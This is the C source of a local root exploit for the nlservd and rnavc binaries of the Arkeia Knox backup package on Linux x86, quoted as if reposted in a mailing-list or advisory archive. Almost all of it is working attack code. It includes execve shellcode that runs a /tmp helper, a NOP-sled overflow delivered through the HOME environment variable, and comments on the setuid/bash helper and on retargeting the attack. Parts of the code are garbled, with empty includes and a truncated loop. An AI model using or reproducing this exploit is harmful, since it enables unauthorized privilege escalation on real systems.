* > * nlservd/rnavc local root exploit for Linux x86 tested on SuSE 6.2 > * exploits Arkiea's Knox backup package. > * gcc -o knox knox.c > * ./knox > * > * > * NOTE: you *MUST* have void main(){setuid(geteuid()); > system("/bin/bash");} > * compiled in /tmp/ui for this to work. > * > * To exploit rnavc, simply change the execl call to > ("/usr/bin/knox/rnavc", > * "rnavc", NULL) > * -Brock Tellier btellier@webley.com > */ > > > #include > #include > > char exec[]= /* Generic Linux x86 running our /tmp program */ > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/tmp/ui"; > > > > #define LEN 2000 > #define NOP 0x90 > > unsigned long get_sp(void) { > > __asm__("movl %esp, %eax"); > > } > > > void main(int argc, char *argv[]) { > > int offset=0; > int i; > int buflen = LEN; > long int addr; > char buf[LEN]; > > if(argc > 3) { > fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); > exit(0); > } > else if (argc == 2){ > offset=atoi(argv[1]); > > } > else if (argc == 3) { > offset=atoi(argv[1]); > buflen=atoi(argv[2]); > > } > else { > offset=2800; > buflen=1200; > > } > > > addr=get_sp(); > > fprintf(stderr, "Arkiea Knox backup package exploit\n"); > fprintf(stderr, "For nlservd and rnavc\n"); > fprintf(stderr, "Brock Tellier btellier@webley.com\n"); > fprintf(stderr, "Using addr: 0x%x\n", addr+offset); > > memset(buf,NOP,buflen); > memcpy(buf+(buflen/2),exec,strlen(exec)); > for(i=((buflen/2) + strlen(exec))+3;i *(int *)&buf[i]=addr+offset; > > setenv("HOME", buf, 1); > execl("/usr/knox/bin/nlservd", "nlservd", NULL); > > > }